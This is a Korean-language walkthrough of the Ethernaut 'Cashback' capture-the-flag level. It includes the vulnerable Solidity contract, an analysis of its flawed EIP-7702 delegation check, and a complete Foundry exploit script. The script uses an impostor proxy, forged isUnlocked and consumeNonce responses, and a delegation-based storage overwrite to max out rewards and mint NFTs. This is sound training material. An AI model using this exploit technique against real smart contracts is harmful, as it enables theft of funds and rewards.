Ethernaut 36 Cashback

문제#

지문#

You’ve just joined Cashback, the hottest crypto neobank in town.
Their pitch is irresistible: for every on-chain payment you make, you
earn points. Rack up enough and you’ll reach legendary status, unlocking
the coveted Super Cashback NFT badge. The system leverages EIP-7702 to allow EOAs to accrue cashback. Users must delegate to the Cashback contract to use the payWithCashback function. Rumor has it there’s a back door for power users. Your brief is
simple: become the loyalty program’s nightmare. Max out your cashback in
every supported currency and walk away with at least two Super Cashback
NFT, one of which must correspond to your player address.

코드#

1
// SPDX-License-Identifier: MIT
2
pragma solidity 0.8.30;
3

4
import {IERC20} from "openzeppelin-contracts-v5.4.0/token/ERC20/IERC20.sol";
5
import {IERC721} from "openzeppelin-contracts-v5.4.0/token/ERC721/IERC721.sol";
6
import {ERC1155} from "openzeppelin-contracts-v5.4.0/token/ERC1155/ERC1155.sol";
7
import {TransientSlot} from "openzeppelin-contracts-v5.4.0/utils/TransientSlot.sol";
8

9
/*//////////////////////////////////////////////////////////////
10
                        CURRENCY LIBRARY
11
//////////////////////////////////////////////////////////////*/
12

13
type Currency is address;
14

15
using {equals as ==} for Currency global;
16
using CurrencyLibrary for Currency global;
17

18
function equals(Currency currency, Currency other) pure returns (bool) {
19
    return Currency.unwrap(currency) == Currency.unwrap(other);
20
}
21

22
library CurrencyLibrary {
23
    error NativeTransferFailed();
24
    error ERC20IsNotAContract();
25
    error ERC20TransferFailed();
26

27
    Currency public constant NATIVE_CURRENCY = Currency.wrap(0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE);
28

29
    function isNative(Currency currency) internal pure returns (bool) {
30
        return Currency.unwrap(currency) == Currency.unwrap(NATIVE_CURRENCY);
31
    }
32

33
    function transfer(Currency currency, address to, uint256 amount) internal {
34
        if (currency.isNative()) {
35
            (bool success,) = to.call{value: amount}("");
36
            require(success, NativeTransferFailed());
37
        } else {
38
            (bool success, bytes memory data) = Currency.unwrap(currency).call(abi.encodeCall(IERC20.transfer, (to, amount)));
39
            require(Currency.unwrap(currency).code.length != 0, ERC20IsNotAContract());
40
            require(success, ERC20TransferFailed());
41
            require(data.length == 0 || true == abi.decode(data, (bool)), ERC20TransferFailed());
42
        }
43
    }
44

45
    function toId(Currency currency) internal pure returns (uint256) {
46
        return uint160(Currency.unwrap(currency));
47
    }
48
}
49

50
/*//////////////////////////////////////////////////////////////
51
                       CASHBACK CONTRACT
52
//////////////////////////////////////////////////////////////*/
53

54
/// @dev keccak256(abi.encode(uint256(keccak256("Cashback")) - 1)) & ~bytes32(uint256(0xff))
55
contract Cashback is ERC1155 layout at 0x442a95e7a6e84627e9cbb594ad6d8331d52abc7e6b6ca88ab292e4649ce5ba00 {
56
    using TransientSlot for *;
57

58
    error CashbackNotCashback();
59
    error CashbackIsCashback();
60
    error CashbackNotAllowedInCashback();
61
    error CashbackOnlyAllowedInCashback();
62
    error CashbackNotDelegatedToCashback();
63
    error CashbackNotEOA();
64
    error CashbackNotUnlocked();
65
    error CashbackSuperCashbackNFTMintFailed();
66

67
    bytes32 internal constant UNLOCKED_TRANSIENT = keccak256("cashback.storage.Unlocked");
68
    uint256 internal constant BASIS_POINTS = 10000;
69
    uint256 internal constant SUPERCASHBACK_NONCE = 10000;
70
    Cashback internal immutable CASHBACK_ACCOUNT = this;
71
    address public immutable superCashbackNFT;
72

73
    uint256 public nonce;
74
    mapping(Currency => uint256 Rate) public cashbackRates;
75
    mapping(Currency => uint256 MaxCashback) public maxCashback;
76

77
    modifier onlyCashback() {
78
        require(msg.sender == address(CASHBACK_ACCOUNT), CashbackNotCashback());
79
        _;
80
    }
81

82
    modifier onlyNotCashback() {
83
        require(msg.sender != address(CASHBACK_ACCOUNT), CashbackIsCashback());
84
        _;
85
    }
86

87
    modifier notOnCashback() {
88
        require(address(this) != address(CASHBACK_ACCOUNT), CashbackNotAllowedInCashback());
89
        _;
90
    }
91

92
    modifier onlyOnCashback() {
93
        require(address(this) == address(CASHBACK_ACCOUNT), CashbackOnlyAllowedInCashback());
94
        _;
95
    }
96

97
    modifier onlyDelegatedToCashback() {
98
        bytes memory code = msg.sender.code;
99

100
        address payable delegate;
101
        assembly {
102
            delegate := mload(add(code, 0x17))
103
        }
104
        require(Cashback(delegate) == CASHBACK_ACCOUNT, CashbackNotDelegatedToCashback());
105
        _;
106
    }
107

108
    modifier onlyEOA() {
109
        require(msg.sender == tx.origin, CashbackNotEOA());
110
        _;
111
    }
112

113
    modifier unlock() {
114
        UNLOCKED_TRANSIENT.asBoolean().tstore(true);
115
        _;
116
        UNLOCKED_TRANSIENT.asBoolean().tstore(false);
117
    }
118

119
    modifier onlyUnlocked() {
120
        require(Cashback(payable(msg.sender)).isUnlocked(), CashbackNotUnlocked());
121
        _;
122
    }
123

124
    receive() external payable onlyNotCashback {}
125

126
    constructor(
127
        address[] memory cashbackCurrencies,
128
        uint256[] memory currenciesCashbackRates,
129
        uint256[] memory currenciesMaxCashback,
130
        address _superCashbackNFT
131
    ) ERC1155("") {
132
        uint256 len = cashbackCurrencies.length;
133
        for (uint256 i = 0; i < len; i++) {
134
            cashbackRates[Currency.wrap(cashbackCurrencies[i])] = currenciesCashbackRates[i];
135
            maxCashback[Currency.wrap(cashbackCurrencies[i])] = currenciesMaxCashback[i];
136
        }
137

138
        superCashbackNFT = _superCashbackNFT;
139
    }
140

141
    // Implementation Functions
142
    function accrueCashback(Currency currency, uint256 amount) external onlyDelegatedToCashback onlyUnlocked onlyOnCashback{
143
        uint256 newNonce = Cashback(payable(msg.sender)).consumeNonce();
144
        uint256 cashback = (amount * cashbackRates[currency]) / BASIS_POINTS;
145

146
        if (cashback != 0) {
147
            uint256 _maxCashback = maxCashback[currency];
148
            if (balanceOf(msg.sender, currency.toId()) + cashback > _maxCashback) {
149
                cashback = _maxCashback - balanceOf(msg.sender, currency.toId());
150
            }
151

152
            uint256[] memory ids = new uint256[](1);
153
            ids[0] = currency.toId();
154
            uint256[] memory values = new uint256[](1);
155
            values[0] = cashback;
156
            _update(address(0), msg.sender, ids, values);
157
        }
158
        if (SUPERCASHBACK_NONCE == newNonce) {
159
            (bool success,) = superCashbackNFT.call(abi.encodeWithSignature("mint(address)", msg.sender));
160
            require(success, CashbackSuperCashbackNFTMintFailed());
161
        }
162
    }
163

164
    // Smart Account Functions
165
    function payWithCashback(Currency currency, address receiver, uint256 amount) external unlock onlyEOA notOnCashback {
166
        currency.transfer(receiver, amount);
167
        CASHBACK_ACCOUNT.accrueCashback(currency, amount);
168
    }
169

170
    function consumeNonce() external onlyCashback notOnCashback returns (uint256) {
171
        return ++nonce;
172
    }
173

174
    function isUnlocked() public view returns (bool) {
175
        return UNLOCKED_TRANSIENT.asBoolean().tload();
176
    }
177
}

배경지식#

EIP-7702는 EOA가 일시적으로 특정 컨트랙트 구현체에 delegate된 것처럼 동작하게 하는 방식이다. delegate된 EOA의 code는 일반적으로 다음 형태가 된다.

1
0xef0100 || implementation_address

즉 길이는 23바이트이고, 앞의 3바이트는 designator, 뒤의 20바이트는 실행을 위임할 구현체 주소다. 이 문제의 의도는 player EOA를 Cashback에 delegate한 뒤 payWithCashback를 호출하는 것이다. 그러면 함수 실행은 Cashback 코드로 처리되지만 storage context는 player EOA 쪽이 된다.

cashback 포인트는 ERC1155로 관리된다. Currency.toId()가 uint160(currency)를 반환하므로 currency 주소가 곧 ERC1155 token id가 된다. Super Cashback NFT는 ERC721이다. factory의 검증 조건을 보면 player가 최소 2개의 NFT를 가지고 있어야 하고, 그중 하나는 token id가 uint160(player)인 NFT여야 한다.

1
ERC721(Cashback(_instance).superCashbackNFT()).ownerOf(uint256(uint160(_player))) == _player
2
    && ERC721(Cashback(_instance).superCashbackNFT()).balanceOf(_player) >= 2

따라서 단순히 아무 주소로 NFT를 두 개 mint하는 것으로는 부족하다. player 주소에 해당하는 token id의 NFT가 반드시 player에게 있어야 한다.

payWithCashback는 unlock modifier에서 transient storage를 켠 뒤 accrueCashback를 호출한다.

1
modifier unlock() {
2
    UNLOCKED_TRANSIENT.asBoolean().tstore(true);
3
    _;
4
    UNLOCKED_TRANSIENT.asBoolean().tstore(false);
5
}

transient storage는 트랜잭션 동안만 유지되는 임시 storage다. 이 문제에서는 onlyUnlocked를 통과하기 위한 플래그로 쓰인다.

문제 코드 분석#

문제 본문에는 Cashback 코드만 있지만, factory의 validateInstance 조건도 봐야 한다.

1
return Cashback(_instance).balanceOf(_player, Currency.wrap(NATIVE_CURRENCY).toId()) == NATIVE_MAX_CASHBACK
2
    && Cashback(_instance).balanceOf(_player, Currency.wrap(address(FREE)).toId()) == FREE_MAX_CASHBACK
3
    && ERC721(Cashback(_instance).superCashbackNFT()).ownerOf(uint256(uint160(_player))) == _player
4
    && ERC721(Cashback(_instance).superCashbackNFT()).balanceOf(_player) >= 2 && _player.code.length == 23
5
    && bytes23(_player.code) == expectedCode;

player는 native currency cashback을 1 ether, FREE cashback을 500 ether까지 채워야 한다. 또 Super Cashback NFT를 최소 2개 가져야 하며, 최종적으로 player EOA의 code는 0xef0100 || instance여야 한다. 지원 currency는 두 개다.

1
cashbackCurrencies[0] = NATIVE_CURRENCY;
2
cashbackCurrencies[1] = address(FREE);

accrueCashback에는 onlyDelegatedToCashback가 걸려 있다.

1
modifier onlyDelegatedToCashback() {
2
    bytes memory code = msg.sender.code;
3

4
    address payable delegate;
5
    assembly {
6
        delegate := mload(add(code, 0x17))
7
    }
8
    require(Cashback(delegate) == CASHBACK_ACCOUNT, CashbackNotDelegatedToCashback());
9
    _;
10
}

이 검사는 EIP-7702 designator 전체를 확인하지 않는다. msg.sender.code에서 특정 위치를 읽어 delegate 주소가 Cashback인지 확인할 뿐이다. msg.sender가 진짜 EIP-7702 EOA일 필요는 없다. msg.sender.code[3:23] 위치에 Cashback 주소가 들어가 있고, 나머지는 원하는 로직을 수행하는 proxy 컨트랙트여도 이 검사를 통과할 수 있다.

accrueCashback는 다음 순서로 msg.sender에게 다시 호출한다.

1
uint256 newNonce = Cashback(payable(msg.sender)).consumeNonce();
2
uint256 cashback = (amount * cashbackRates[currency]) / BASIS_POINTS;

그리고 onlyUnlocked도 msg.sender의 isUnlocked()를 확인한다.

1
modifier onlyUnlocked() {
2
    require(Cashback(payable(msg.sender)).isUnlocked(), CashbackNotUnlocked());
3
    _;
4
}

즉 msg.sender가 우리가 만든 proxy라면 isUnlocked()와 consumeNonce()를 마음대로 응답할 수 있다. isUnlocked()는 항상 true, consumeNonce()는 한 번 10000을 반환하게 만들면 accrueCashback를 직접 호출하면서 Super Cashback NFT도 mint할 수 있다.

cashback 계산은 다음과 같다.

1
uint256 cashback = (amount * cashbackRates[currency]) / BASIS_POINTS;

factory 기준 rate와 max는 다음 값이다.

1
uint256 constant NATIVE_CASHBACK_RATE = 50; // 0.5%
2
uint256 constant FREE_CASHBACK_RATE = 200; // 2%
3
uint256 constant NATIVE_MAX_CASHBACK = 1 ether;
4
uint256 constant FREE_MAX_CASHBACK = 500 ether;

상한까지 mint하고 싶으면 필요한 결제 금액은 대략 다음과 같다.

amount = \left\lceil \frac{targetCashback \times 10000}{rate} \right\rceil

실제 결제가 일어나는 payWithCashback를 쓰는 것이 아니라 accrueCashback를 직접 호출하므로, 이 금액만 인자로 넘기면 된다.

proxy로 ERC1155 cashback과 첫 번째 NFT를 얻는 것만으로는 부족하다. factory는 마지막에 player code가 정확히 0xef0100 || instance인지 확인한다.

1
bytes23 expectedCode = bytes23(bytes.concat(hex"ef0100", abi.encodePacked(_instance)));
2
_player.code.length == 23 && bytes23(_player.code) == expectedCode

exploit 마지막에는 player EOA를 진짜 Cashback instance에 EIP-7702 delegate해야 한다. 또 player 주소 token id의 NFT를 만들려면 player context에서 consumeNonce()가 10000이 되도록 해야 한다. Cashback의 storage layout은 ERC-7201 custom layout을 쓰고, nonce는 base slot에서 offset 3에 있다.

1
contract Cashback is ERC1155 layout at 0x442a95e7a6e84627e9cbb594ad6d8331d52abc7e6b6ca88ab292e4649ce5ba00 {
2
    uint256 public nonce;

그래서 잠깐 player를 CashbackNonceSetter에 delegate해서 nonce = 9999를 써두고, 다시 Cashback에 delegate한 뒤 payWithCashback(..., 0)을 호출한다. 그러면 consumeNonce()가 10000을 반환하고, player token id의 NFT가 mint된다.

풀이#

먼저 CashbackImpostor proxy를 만든다. runtime 앞부분은 PUSH22(0x0000 || cashback); POP 형태로 둔다.

1
hex"750000", cashback, hex"50..."

이렇게 하면 code[3:23]에 cashback 주소가 들어가 onlyDelegatedToCashback의 mload(add(code, 0x17)) 검사를 통과한다. 동시에 주소 바이트는 PUSH22의 immediate data라서 EVM 실행 흐름을 망가뜨리지 않는다. proxy는 나머지 calldata를 CashbackImpostorLogic으로 delegatecall한다. logic은 isUnlocked()를 항상 true로 응답하고, 첫 consumeNonce()에서 10000을 반환한다. 그러면 proxy 주소로 cashback ERC1155가 mint되고, proxy 주소 token id의 Super Cashback NFT도 하나 mint된다. 그 다음 proxy가 가진 ERC1155 cashback을 player에게 넘기고, proxy token id의 NFT도 player에게 넘긴다. 마지막으로 player EOA의 delegation을 조작한다. 먼저 CashbackNonceSetter에 delegate해서 player storage의 nonce를 9999로 세팅하고, 이후 Cashback에 delegate해서 payWithCashback(NATIVE, player, 0)을 호출한다. 이 호출에서 player token id의 Super Cashback NFT가 mint되고, player code도 최종 검증 조건인 0xef0100 || instance가 된다. 중간에 player가 이전 instance에 delegate되어 있을 수 있다. 그러면 ERC1155 safeTransferFrom이 player를 컨트랙트로 보고 onERC1155Received를 호출하다가 revert된다. 그래서 exploit 시작 시 player delegation을 address(0)으로 한 번 clear한다.

익스플로잇#

1
// SPDX-License-Identifier: MIT
2
pragma solidity ^0.8.28;
3

4
import "forge-std/Script.sol";
5

6
type Currency is address;
7

8
interface ICashback {
9
    function accrueCashback(Currency currency, uint256 amount) external;
10
    function balanceOf(address account, uint256 id) external view returns (uint256);
11
    function cashbackRates(Currency currency) external view returns (uint256);
12
    function maxCashback(Currency currency) external view returns (uint256);
13
    function payWithCashback(Currency currency, address receiver, uint256 amount) external;
14
    function safeTransferFrom(address from, address to, uint256 id, uint256 value, bytes calldata data) external;
15
    function superCashbackNFT() external view returns (address);
16
}
17

18
interface ICashbackFactory {
19
    function FREE() external view returns (address);
20
}
21

22
interface IERC721Like {
23
    function balanceOf(address account) external view returns (uint256);
24
    function ownerOf(uint256 tokenId) external view returns (address);
25
    function transferFrom(address from, address to, uint256 tokenId) external;
26
}
27

28
interface ICashbackImpostor {
29
    function attack(address cashback, address beneficiary, address[] calldata currencies) external;
30
    function transferERC721(address nft, address to, uint256 tokenId) external;
31
}
32

33
interface ICashbackNonceSetter {
34
    function setCashbackNonce(uint256 value) external;
35
}
36

37
contract CashbackImpostorLogic {
38
    uint256 private constant BASIS_POINTS = 10000;
39
    Currency private constant NATIVE_CURRENCY = Currency.wrap(0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE);
40
    bool private superCashbackMinted;
41

42
    function attack(address cashback_, address beneficiary, address[] calldata currencies) external {
43
        ICashback cashback = ICashback(cashback_);
44
        uint256 nftMints;
45

46
        for (uint256 i = 0; i < currencies.length; i++) {
47
            Currency currency = Currency.wrap(currencies[i]);
48
            uint256 id = uint160(currencies[i]);
49
            uint256 maxAmount = cashback.maxCashback(currency);
50
            uint256 beneficiaryBalance = cashback.balanceOf(beneficiary, id);
51

52
            if (beneficiaryBalance >= maxAmount) {
53
                continue;
54
            }
55

56
            uint256 rate = cashback.cashbackRates(currency);
57
            require(rate != 0, "unsupported currency");
58

59
            uint256 remaining = maxAmount - beneficiaryBalance;
60
            uint256 paymentAmount = _cashbackToPaymentAmount(remaining, rate);
61

62
            cashback.accrueCashback(currency, paymentAmount);
63
            cashback.safeTransferFrom(address(this), beneficiary, id, remaining, "");
64
            nftMints++;
65
        }
66

67
        while (nftMints < 2) {
68
            cashback.accrueCashback(NATIVE_CURRENCY, 0);
69
            nftMints++;
70
        }
71
    }
72

73
    function transferERC721(address nft, address to, uint256 tokenId) external {
74
        IERC721Like(nft).transferFrom(address(this), to, tokenId);
75
    }
76

77
    function isUnlocked() external pure returns (bool) {
78
        return true;
79
    }
80

81
    function consumeNonce() external returns (uint256) {
82
        if (!superCashbackMinted) {
83
            superCashbackMinted = true;
84
            return 10000;
85
        }
86

87
        return 1;
88
    }
89

90
    function _cashbackToPaymentAmount(uint256 cashbackAmount, uint256 rate) private pure returns (uint256) {
91
        uint256 quotient = cashbackAmount / rate;
92
        uint256 remainder = cashbackAmount % rate;
93
        uint256 amount = quotient * BASIS_POINTS;
94

95
        if (remainder != 0) {
96
            amount += ((remainder * BASIS_POINTS) + rate - 1) / rate;
97
        }
98

99
        return amount;
100
    }
101
}
102

103
contract CashbackImpostor {
104
    constructor(address cashback, address implementation) payable {
105
        bytes memory runtime = abi.encodePacked(
106
            hex"750000", cashback, hex"50363d3d373d3d3d363d73", implementation, hex"5af43d82803e903d91604357fd5bf3"
107
        );
108

109
        assembly {
110
            return(add(runtime, 0x20), mload(runtime))
111
        }
112
    }
113
}
114

115
contract CashbackNonceSetter {
116
    bytes32 private constant CASHBACK_STORAGE = 0x442a95e7a6e84627e9cbb594ad6d8331d52abc7e6b6ca88ab292e4649ce5ba00;
117

118
    function setCashbackNonce(uint256 value) external {
119
        bytes32 slot = bytes32(uint256(CASHBACK_STORAGE) + 3);
120

121
        assembly {
122
            sstore(slot, value)
123
        }
124
    }
125
}
126

127
contract Sol36 is Script {
128
    address private constant CASHBACK_FACTORY = 0xaCC5D8b0dc23b3e8b1651900e5064ce7CB851E89;
129
    Currency private constant NATIVE_CURRENCY = Currency.wrap(0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE);
130
    uint256 private constant SUPERCASHBACK_NONCE_PREIMAGE = 9999;
131

132
    function run() external {
133
        uint256 privateKey = vm.envUint("PRIVATE_KEY");
134
        address player = vm.addr(privateKey);
135
        ICashback cashback = ICashback(vm.envAddress("CASHBACK_INSTANCE"));
136
        address free = ICashbackFactory(CASHBACK_FACTORY).FREE();
137
        address superCashbackNFT = cashback.superCashbackNFT();
138
        address[] memory currencies = new address[](2);
139
        currencies[0] = Currency.unwrap(NATIVE_CURRENCY);
140
        currencies[1] = free;
141

142
        vm.startBroadcast(privateKey);
143

144
        CashbackImpostorLogic logic = new CashbackImpostorLogic();
145
        address impostor = address(new CashbackImpostor(address(cashback), address(logic)));
146

147
        vm.signAndAttachDelegation(address(0), privateKey);
148
        (bool cleared,) = player.call("");
149
        require(cleared, "clear delegation failed");
150

151
        ICashbackImpostor(impostor).attack(address(cashback), player, currencies);
152

153
        uint256 impostorTokenId = uint256(uint160(impostor));
154
        ICashbackImpostor(impostor).transferERC721(superCashbackNFT, player, impostorTokenId);
155

156
        CashbackNonceSetter nonceSetter = new CashbackNonceSetter();
157
        vm.signAndAttachDelegation(address(nonceSetter), privateKey);
158
        ICashbackNonceSetter(player).setCashbackNonce(SUPERCASHBACK_NONCE_PREIMAGE);
159

160
        vm.signAndAttachDelegation(address(cashback), privateKey);
161
        ICashback(player).payWithCashback(NATIVE_CURRENCY, player, 0);
162

163
        uint256 playerTokenId = uint256(uint160(player));
164
        require(IERC721Like(superCashbackNFT).ownerOf(playerTokenId) == player, "player token NFT missing");
165
        require(IERC721Like(superCashbackNFT).balanceOf(player) >= 2, "player needs two NFTs");
166
        require(
167
            player.code.length == 23
168
                && bytes23(player.code) == bytes23(abi.encodePacked(hex"ef0100", address(cashback))),
169
            "player is not delegated"
170
        );
171

172
        _verifyCashbackBalances(cashback, player, currencies);
173

174
        vm.stopBroadcast();
175
    }
176

177
    function _verifyCashbackBalances(ICashback cashback, address player, address[] memory currencies) private view {
178
        for (uint256 i = 0; i < currencies.length; i++) {
179
            Currency currency = Currency.wrap(currencies[i]);
180
            uint256 id = uint160(currencies[i]);
181
            require(cashback.balanceOf(player, id) == cashback.maxCashback(currency), "cashback is not maxed");
182
        }
183
    }
184
}

screenshot